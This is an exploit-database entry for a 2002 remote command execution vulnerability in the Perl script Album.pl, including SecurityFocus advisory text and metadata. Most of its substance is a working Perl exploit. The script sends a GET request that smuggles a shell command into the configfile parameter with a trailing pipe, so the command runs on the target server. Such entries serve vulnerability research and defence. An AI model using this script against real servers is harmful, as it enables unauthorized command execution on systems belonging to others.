Album.pl Remote Command Execution Vulnerability

vendor:

Album.pl

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Command Execution

CWE

Product Name: Album.pl

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Perl

2002

Album.pl Remote Command Execution Vulnerability

A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.

Mitigation:

No known mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7444/info

A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.

The precise technical details of this vulnerability are currently unknown. This BID will be updated as further information is available.

#!/usr/bin/perl -w

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;

if (!$ARGV[0] && !$ARGV[1])
{
	print "\n Usage: perl $0 <album_uri> \"<command>\" \n\n";
	exit;
}

$command="$ARGV[0]?configfile=$ARGV[1]|";

my $conn=LWP::UserAgent->new();
my $data=HTTP::Request->new(GET => $command);
my $result=$conn->request($data);
if ($result->is_error())
{
	printf " %s\n", $result->status_line;
}
else
{
	print "Success: $result\n";
}